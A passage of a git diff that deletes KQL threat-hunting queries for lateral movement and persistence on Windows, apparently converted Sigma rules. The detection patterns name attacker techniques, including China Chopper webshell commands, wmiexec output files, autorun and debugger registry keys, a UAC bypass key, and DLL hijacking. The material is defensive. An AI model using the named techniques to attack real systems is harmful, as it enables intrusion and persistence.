(InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and
(not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Lateral Movement/Terminal_Service_Process_Spawn.kql b/Lateral Movement/Terminal_Service_Process_Spawn.kql
deleted file mode 100644
index 0e46fcfe..00000000
--- a/Lateral Movement/Terminal_Service_Process_Spawn.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/05/22
-// Level: high
-// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql b/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql
deleted file mode 100644
index 959bf177..00000000
--- a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Ilyas Ochkov, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-
-// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003
-DeviceNetworkEvents
-| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql b/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql
deleted file mode 100644
index b8bb4681..00000000
--- a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: high
-// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index 38313837..00000000
--- a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects when an admin share is mounted using net.exe
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index d5e9627d..00000000
--- a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/21
-// Level: high
-// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index a8ed798d..00000000
--- a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/02
-// Level: low
-// Description: Detects when a share is mounted using the "net.exe" utility
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Wmiexec_Default_Output_File.kql b/Lateral Movement/Wmiexec_Default_Output_File.kql
deleted file mode 100644
index e9f42bee..00000000
--- a/Lateral Movement/Wmiexec_Default_Output_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/02
-// Level: critical
-// Description: Detects the creation of the default output filename used by the wmiexec tool
-// Tags: attack.lateral_movement, attack.t1047
-DeviceFileEvents
-| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$"
\ No newline at end of file
diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql
deleted file mode 100644
index 631d57e9..00000000
--- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
deleted file mode 100644
index 60ed5e82..00000000
--- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/Lateral Movement/Writing_Local_Admin_Share.kql b/Lateral Movement/Writing_Local_Admin_Share.kql
deleted file mode 100644
index 0c4f5452..00000000
--- a/Lateral Movement/Writing_Local_Admin_Share.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: medium
-// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
-This technique is used by post-exploitation frameworks.
-
-// Tags: attack.lateral_movement, attack.t1546.002
-DeviceFileEvents
-| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\"
\ No newline at end of file
diff --git a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql
deleted file mode 100644
index df2ed998..00000000
--- a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p"))
\ No newline at end of file
diff --git a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql
deleted file mode 100644
index 2d468438..00000000
--- a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger"
\ No newline at end of file
diff --git a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql b/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql
deleted file mode 100644
index 62bd55fb..00000000
--- a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
-A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
-
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\Control\\Print\\Monitors") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey contains "Control\\Print\\Environments" and RegistryKey contains "\\Drivers" and RegistryKey contains "\\VNC Printer"))))
\ No newline at end of file
diff --git a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index 0fd4d7cb..00000000
--- a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: high
-// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql
deleted file mode 100644
index d35ec172..00000000
--- a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: high
-// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Persistence/Atbroker_Registry_Change.kql b/Persistence/Atbroker_Registry_Change.kql
deleted file mode 100644
index 465dcede..00000000
--- a/Persistence/Atbroker_Registry_Change.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
-// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/Persistence/Bypass_UAC_Using_Event_Viewer.kql b/Persistence/Bypass_UAC_Using_Event_Viewer.kql
deleted file mode 100644
index 8ebc277f..00000000
--- a/Persistence/Bypass_UAC_Using_Event_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %"))
\ No newline at end of file
diff --git a/Persistence/COM_Hijacking_via_TreatAs.kql b/Persistence/COM_Hijacking_via_TreatAs.kql
deleted file mode 100644
index 1acd1872..00000000
--- a/Persistence/COM_Hijacking_via_TreatAs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/28
-// Level: medium
-// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")))
\ No newline at end of file
diff --git a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql b/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql
deleted file mode 100644
index 30e0a99f..00000000
--- a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects when a program changes the default file association of any extension to an executable.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
-// Tags: attack.persistence, attack.t1546.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile"))
\ No newline at end of file
diff --git a/Persistence/Change_Default_File_Association_Via_Assoc.kql b/Persistence/Change_Default_File_Association_Via_Assoc.kql
deleted file mode 100644
index 782118cf..00000000
--- a/Persistence/Change_Default_File_Association_Via_Assoc.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects file association changes using the builtin "assoc" command.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
-// Tags: attack.persistence, attack.t1546.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql b/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql
deleted file mode 100644
index 9db5f4d8..00000000
--- a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
-Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
-Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
-
-// Tags: attack.persistence, attack.t1574.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d ")
\ No newline at end of file
diff --git a/Persistence/Chopper_Webshell_Process_Pattern.kql b/Persistence/Chopper_Webshell_Process_Pattern.kql
deleted file mode 100644
index 41494db7..00000000
--- a/Persistence/Chopper_Webshell_Process_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), MSTI (query)
-// Date: 2022/10/01
-// Level: high
-// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")
\ No newline at end of file
diff --git a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
deleted file mode 100644
index 89bb9dfa..00000000
--- a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
-// Date: 2022/06/19
-// Level: medium
-// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
-// Tags: attack.persistence, attack.t1176
-DeviceProcessEvents
-| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/Persistence/Classes_Autorun_Keys_Modification.kql b/Persistence/Classes_Autorun_Keys_Modification.kql
deleted file mode 100644
index e4bc363b..00000000
--- a/Persistence/Classes_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey contains "\\lnkfile\\shellex\\ContextMenuHandlers"))))
\ No newline at end of file
diff --git a/Persistence/Common_Autorun_Keys_Modification.kql b/Persistence/Common_Autorun_Keys_Modification.kql
deleted file mode 100644
index de1f0fb4..00000000
--- a/Persistence/Common_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains 
"\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\poqexec.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler" or RegistryKey contains "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/Persistence/Control_Panel_Items.kql b/Persistence/Control_Panel_Items.kql
deleted file mode 100644
